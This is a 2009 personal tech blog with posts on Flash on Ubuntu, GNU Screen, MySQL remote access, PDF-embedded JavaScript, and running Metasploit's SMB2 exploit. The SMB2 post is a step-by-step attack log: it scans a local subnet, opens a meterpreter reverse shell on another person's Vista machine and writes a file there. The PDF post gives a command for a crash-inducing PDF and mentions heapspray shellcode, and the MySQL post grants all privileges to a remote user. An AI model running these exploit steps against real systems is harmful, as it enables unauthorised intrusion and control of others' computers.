Friday, October 16, 2009

Updating Firefox 3.5 Flash Player in Ubuntu

This is just for my future reference in case I forgot about it again.

I try to view the dashboard in Snorby demo page. Sadly, the wonderful graph did not show up. I check for my flash plugin, it is a default installation of version 9.0. So I decided to check for the latest version at Adobe site and it is already version 10.0.32.18.

So I download the Adobe Flash .deb package and install
sudo dpkg -i install_flash_player_10_linux.deb

I restart my Firefox, and still it detect my Shockwave Flash as version 9.
So here are trick for it;
sudo mv /usr/lib/swfdec-mozilla/libswfdecmozilla.so /usr/lib/swfdec-mozilla/libswfdecmozilla.old
sudo cp /usr/lib/adobe-flashplugin/libflashplayer.so /usr/lib/swfdec-mozilla/libswfdecmozilla.so
sudo cp /usr/lib/adobe-flashplugin/libflashplayer.so /usr/lib/firefox/plugins/

Restart your Firefox, and check about:plugins

Wednesday, October 14, 2009

PDF Structure + embedded JavaScript

Since recently, I’ve been studying about PDF structure and how it can be a platform to distribute and infect malware to user. All I can say, it is made possible through vulnerability in handling JavaScript. As my friend quoted from Didiers Stevens statement, “PDF + JS = OMG”.

Actually Didiers Stevens has come out with a tool that allows you to create a PDF file and embed JavaScript code into the file. It is a nice tool which allow us to learn about the structure of PDF file and how JavaScript code is embedded into it. Have a look it in here.

Example PDF file that’ll crash Adobe Reader 8.1.2 on XP SP2
$ python make-pdf-javascript.py -j “util.printf(’%5000f’, 0.0);” donotopen.pdf



From here, with a complete JavaScript code to do heapspray and execute shellcode, the PDF file is ready to get to the user and infect the computer.

GNU Screen rawks!

I’ve always heard about screen before but never had an interest to read about and try. Up until recently, a friend of mine use it and it got my attention on how he manage his terminal with screen.

For a person who work a lot with the terminal-based system, screen can be quite handy application for me to work with. With one terminal emulator and run screen on it, I can edit a code, run irc, connect to ssh, reading a log and etc. I can detach and reattach the screen. If i accidentally close the terminal emulator, all I need to do is open it back and resume my previously-closed screen with the same state.


To start getting to know screen (for those who never installed it yet), run this command:
sudo apt-get install screen
and
man screen

Other reference you might want to look at:

http://www.kuro5hin.org/story/2004/3/9/16838/14935
http://jmcpherson.org/screen.html
http://aperiodic.net/screen/

Tuesday, October 6, 2009

Testing the new smb2 exploit

Recently I’ve downloaded the metasploit framework 3.3 and tested the new unpatched smb2 exploit in my local network ;-D.

Run the metasploit framework console
[email protected] $ ./msfconsole

Scan the network that has smb2 enabled
msf > use auxiliary/scanner/smb/
msf auxiliary(smb2) > set RHOSTS 192.168.1.1-192.168.1.254
RHOSTS => 192.168.1.1-192.168.1.254
msf auxiliary(smb2) > set THREADS 100
THREADS => 100
msf auxiliary(smb2) > run

[*] 192.168.1.10 supports SMB 2 [dialect 2.2] and has been online for 21 hours
[*] 192.168.1.15 supports SMB 2 [dialect 2.2] and has been online for 43 hours
[*] 192.168.1.111 supports SMB 2 [dialect 2.2] and has been online for 30 hours
[*] 192.168.1.121 supports SMB 2 [dialect 2.2] and has been online for 80 hours
[*] 192.168.1.123 supports SMB 2 [dialect 255.2] and has been online for 10 hours
[*] 192.168.1.197 supports SMB 2 [dialect 255.2] and has been online for 8 hours

Quite a result!. Now check for the Windows version from the selected IP
msf exploit(smb2_negotiate_func_index) > use auxiliary/scanner/smb/version
msf auxiliary(version) > set RHOSTS 192.168.1.15
RHOSTS => 192.168.1.15
msf auxiliary(version) > run

[*] 192.168.1.15 is running Windows Vista Ultimate Service Pack 1 (language: Unknown)
[*] Auxiliary module execution completed

It is Windows Vista. Now we’ll run the exploit to that IP
msf auxiliary(version) > use exploit/windows/smb/smb2_negotiate_func_index
msf exploit(smb2_negotiate_func_index) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(smb2_negotiate_func_index) > set LHOST 192.168.1.46
LHOST => 192.168.1.46
msf exploit(smb2_negotiate_func_index) > set LPORT 5678
LPORT => 5678
msf exploit(smb2_negotiate_func_index) > set RHOST 192.168.1.15
RHOST => 192.168.1.15
msf exploit(smb2_negotiate_func_index) > exploit

[*] Connecting to the target (192.168.1.15:445)…
[*] Started reverse handler
[*] Sending the exploit packet (854 bytes)…
[*] Waiting up to 180 seconds for exploit to trigger…
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.46:5678 -> 192.168.1.15:52010)

Succeeded! Now I’ve got access to the computer. That’ll give me a full control to the computer
meterpreter > sysinfo
Computer: GREEN
OS : Windows Vista (Build 6001, Service Pack 1).
Arch : x86
Language: ms_MY
meterpreter > execute -f cmd.exe -c -H -i

Process 636896 created.
Channel 2 created.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\>echo PLEASE DISABLE YOUR SMB2, OR I’LL RETURN > PLEASE DISABLE YOUR SMB2.txt

It is quite a dangerous situation where people are able to get into your computer without you knowing about it. And to get worst, they can get your personal files/folder or spy on you.

If you’re connected to a public wired/wireless network (Starbucks, Old town, or Lab), the recommended solution for the time being is to disable your SMB2. You can get the Microsoft’s released of disabling SMB2 here.

Be not an ignorant or you’ll be in trouble.

Thursday, October 1, 2009

Accessing MySQL database from outside localhost

When I installed or use certain application that needed a MySQL database, mostly it will be accessing from a localhost. For example like the Apache Server and etc. It is much more convenient and easy to configure.

However, as my project require to have a dedicated centralize database server, and the application is reside in other server, so I have to configure the application and MySQL to allow connection from outside localhost. As we all know, by default, MySQL only allow connection or access from within the localhost.

So here’s the solution for this case,

edit your /etc/mysql/my.cnf and change the bind address:
$ sudo vim /etc/mysql/my.cnf

find the word ‘bind-address’ and change 127.0.0.1 to your IP.

Then login to the mysql console:
$ mysql -uroot -pYOURROOTPASSWORD
mysql> GRANT ALL PRIVILEGES ON *.* TO [email protected] IDENTIFIED BY “PASSWORD”;
mysql> FLUSH PRIVILEGES;
mysql> exit
Now you can access your database from outside localhost:
$ mysql -uUSERNAME -pPASSWORD -h MYSQL_SERVER_IP